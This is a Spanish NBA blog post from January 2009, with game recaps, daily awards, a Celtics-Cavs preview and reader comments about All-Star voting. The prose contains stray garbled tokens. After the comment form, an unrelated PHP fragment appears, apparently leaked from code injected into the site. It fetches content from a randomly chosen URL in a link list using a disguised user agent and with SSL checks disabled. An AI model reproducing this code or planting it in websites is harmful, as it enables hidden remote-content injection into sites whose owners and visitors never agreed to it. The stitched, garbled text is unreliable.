La crónica (8/1/2009)

09 de January de 2009 por MagicJohnson32

Como cada jueves, la madrugada nos dejó pocos partidos y, en esta ocasión, sin un excesivo interés. El pasado verano, antes del inicio de la competición, los enfrentamientos Clippers-Spurs y Knicks-Mavs ofrecían perspectivas más atractivas que ahora. Los angelinos cuentan con la mejor enfermería de la liga (Baron Davis, Chris Kaman y Zach Randolph) y en citas tan exigentes como las que supone la visita al AT&T Center de San Antonio pueden aspirar a poco más de lo que hicieron: dar la cara durante tres cuartos para ecurryacabar barridos por los Spurs. Y eso que Duncan se tomó la noche libre (8 puntos, 4 rebotes, 9 asistencias, 2 tapones). Bastó y sobró con la anotación en dobles figuras de Parker, Mason, Bonner, Finley y Ginóbili.

Por parte de los Clippers, lo positivo lo aportaron los habituales, Gordon y Thornton, de los que ya conocíamos su capacidad anotadora. Lo del rookie resulta espectacular: con el de anoche, Gordon suma seis partidos consecutivos de más de 20 puntos. Lo negativo… al margen de haber perdido los últimos 9 partidos, tener a Mardy Collins como titular y jugando 43 minutos es, cuanto menos, preocupante.

Antes se había jugado el partido entre Knicks y Mavericks, en el que la noticia fue la reaparición de Eddy Curry. Tuvo mérito lo suyo: en los dos minutos y medio que disputó, su equipo encajó un -9 de parcial. El partido ofreció poco más que destacar. Entre la gripe y las dobles defensas dejaron a Nowitzki con 10 puntos, compensados por los 19 de Howard, los 13 de Wright, los 10 con 12 rebotes y 4 tapones de Bass, y los 16 de un Kidd que acertó cuando su equipo más lo necesitaba. Por los neoyorquinos, las buenas actuaciones de Duhon y Wilson Chandler no bastaron y el toque de atención de D’Antoni a algunos jugadores sobre sus malos lanzamientos pareció no hacer afecto (Nate Robinson añadió un 1 de 9 en triples a una racha desde más allá de la línea que ya es de 3 de 30 en los últimos cinco partidos).

PREMIOS

MVP: Complicada elección la de hoy, dado que no hubo actuaciones extraordinarias. Nos ayudaremos de la muy relativa estadística del +/- para elegir a Roger Mason, rmasonque contribuyó a la victoria de los Spurs con 18 puntos, 5 rebotes y 3 asistencias. En los 31 minutos que jugó, San Antonio logró un +28.

El rookie: Lo dicho. No es que Eric Gordon tuviese su mejor noche pero aun así se fue a 21 puntos.

La sorpresa: Que seis jugadores de los Spurs anotasen más puntos que Duncan. Suponemos que algo así no sucedía desde… la última vez que Duncan fue baja.

La decepción: Entre Quentin Richardson y Jared Jeffries, ambos titulares, anotaron 2 puntos. Y sus aportaciones en otras facetas estuvieron lejos de compensar su poca anotación.

El mayor esfuerzo en vano: El de Chris Duhon, que anotó 24 puntos con 10 de 14 tiros, incluyendo 4 de 5 en triples, y añadió 7 asistencias.

Hoy, además, inauguramos apartado en nuestras crónicas. Se trata de…

RAZONES PARA TRASNOCHAR

Cada día destacaremos el partido más destacado de cuantos se jugarán la siguiente madrugada, además de al jugador al que hay que seguir de cerca. Hoy las elecciones son sencillas. Éstas son nuestras razones para trasnochar hoy.

pplbjCeltics @ Cavaliers

Las finales del Este adelantan su primer partido cuatro meses. Pocas veces hay tantas cosas en juego en enero: Los Cavs defienden su magnífico registro como locales (18 victorias, 0 derrotas); los Celtics tratan de poner fin a su particular racha de 3 derrotas consecutivas y seis en los últimos ocho partidos. En el aire, el liderato de la Conferencia; en la memoria, la apasionante eliminatoria que enfrentó a ambos equipos en los pasados Playoffs, aquel séptimo partido, aquel memorable duelo LeBron vs Pierce. Imprescindible.

Horario: 2:00 (hora peninsular) TV: en directo por C+ Deportes y en diferido (a las 3:00) por Cuatro.

Y el jugador al que hay que seguir de cerca esta noche es…

Danny Granger. Indiscutible All-Star, viene de hacer consecutivamente 35 puntos a los Kings, 36 a los Nuggets y 37 a los Suns. La pregunta es obvia: ¿hará 38 a los Lakers? Esta noche a partir de las 4:30 horas lo descubriremos.

Veamos las 5 mejores jugadas de la pasada noche antes de la pregunta del día:

Y la pregunta es… ¿Quién ganará hoy, Celtics o Cavs?

Comenta

15 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Yo digo que los Cavs.

      Citar

  2. couxe dice:
    #2

    Yo también apuesto por los Cavs…

      Citar

  3. Txusma dice:
    #3

    Si fuera en Boston no se yo pero jugando en casa y con las rachas opuestas que llevan parece clara la victoria de los Cavs. Eso si, si ganan los verdes recuperan de un plumazo la confianza perdida.
    ¿Cuando empezaremos a hacer especulaciones serias sobre los asistentes al All-Stars?

      Citar

  4. MagicJohnson32 dice:
    #4

    Pues ya va siendo hora.

    Sun Yue es indiscutible ¿no? (porque no lo pueden votar los chinos, que si no lo tenemos de titular por delante de Chris Paul, jojo)

      Citar

  5. Txusma dice:
    #5

    Yi Jianlian esta tercero entre los aleros del Este no?

      Citar

  6. MagicJohnson32 dice:
    #6

    Sí, por detrás de LeBron y Garnett, y por delante de Chris Bosh, Pierce, Granger, etc. De hecho, Granger está octavo, lo cual me indigna. En mi opinión debería estar segundo sólo por detrás de LeBron, pese a que los Pacers estén tan abajo.

    Otras cosas curiosas: Arenas sin jugar es el 6º guard del Este. Ridnour está 7º, por encima Rose, Calderón, Nelson y Joe Johnson. Y Andre Miller no aparece entre los 10 primeros. Entre los pívots, Dalembert está segundo pese a la castaña de temporada que se está marcado el amigo.

    En el Oeste hay cosas muy sangrantes:
    – que T-Mac esté por delante de Chris Paul
    – que Roy y Billups sean 9º y 10º por detrás de gente como Rafer Alston o Jason Terry
    – que Bowen esté 7º entre los forwards, por delante de LaMarcus Aldridge

      Citar

  7. MagicJohnson32 dice:
    #7

    Ah, y Bowen está muy por encima de otros F’s del Oeste como David West o Boozer, que ni aparecen en el Top10.

      Citar

  8. MagicJohnson32 dice:
    #8

    Me he indignado tanto que me he ido a votar a David West, Granger y Roy, jaja.

    Y he puesto a Shaq, ¡¡Yao es un muermo!!

      Citar

  9. couxe dice:
    #9

    Yo también he puesto a Shaq, que por lo menos baila claqué…

      Citar

  10. couxe dice:
    #10

    Yo he vuelto a votar a los que creo que más se lo merecen, que no los que más me gustan…
    Oeste: Paul, Bryant, Duncan, Nowitzky, Jefferson.
    Este: Harris, Wade, Granger, Lebron, Howard.

      Citar

  11. Jabho dice:
    #11

    Yo apuesto por los Celtics por corazón mas que por cabeza. Va estar muy bonito el partido y para mi si, anticipo de finales del Este.

    Lo del All Star para mi es un cachondeo de siempre. Las votaciones indican popularidad mas que otra cosa…

      Citar

  12. xapa_croack dice:
    #12

    Ridnour que es el beckham de la nba??

    Yo he votado a los chinos. Yi a ver si puede ser titular y aguar la fiesta a los gringos.

    Paul, Manudona, Artest, Scola, Yao
    Harris, Wade, Bron, Yi, Horford

      Citar

  13. Txusma dice:
    #13

    Un Yi en el All-Stars no le agua tan solo la fiesta a los gringos. Tb me la agua a mi…

      Citar

  14. David dice:
    #14

    Hola cracks!

    Me gustaría ver el careto que se les queda a los “made-in-USA” si los chinos consiguen colocar a Yi en el All-Star, jeje

    No, ahora fuera coñas, creo que el sistema está montado para que vayan como titulares los más populares. Y qué mejor para ver quienes lo son que un sistema de votaciones… aunque, como la política, sólo sea el resultado de la fría estadística…

    En fin, ahí van MIS quintetos:

    ESTE: Harris, Wade, James, Bosh y Howard
    WEST: D-Will (aunque no esté haciendo una gran temporada por la lesión), Bryant, Anthony, Duncan y O’Neal

    Vamos, yo creo que todos estos estarán en Phoenix…aunque de titulares me da que Harris, Bosh, D-Will (el único que creo que puede no estar) y O’Neal no…

      Citar

  15. David dice:
    #15

    Por cierto, que se me ha olvidado, yo para esta noche apuesto por los Celtics… pero con la rachita que llevan…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>